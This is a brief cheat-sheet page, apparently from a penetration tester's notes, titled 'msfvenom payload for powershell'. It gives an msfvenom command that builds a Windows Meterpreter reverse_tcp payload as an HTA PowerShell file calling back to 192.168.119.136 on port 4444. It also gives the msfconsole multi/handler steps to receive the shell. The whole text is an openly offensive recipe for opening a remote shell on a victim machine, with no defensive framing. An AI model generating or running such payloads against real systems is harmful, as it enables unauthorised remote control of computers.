msfvenom payload for powershell

msfvenom payload of powershell

  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.136 LPORT=4444 -f hta-psh

  • Listen, msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost and lport

Last updated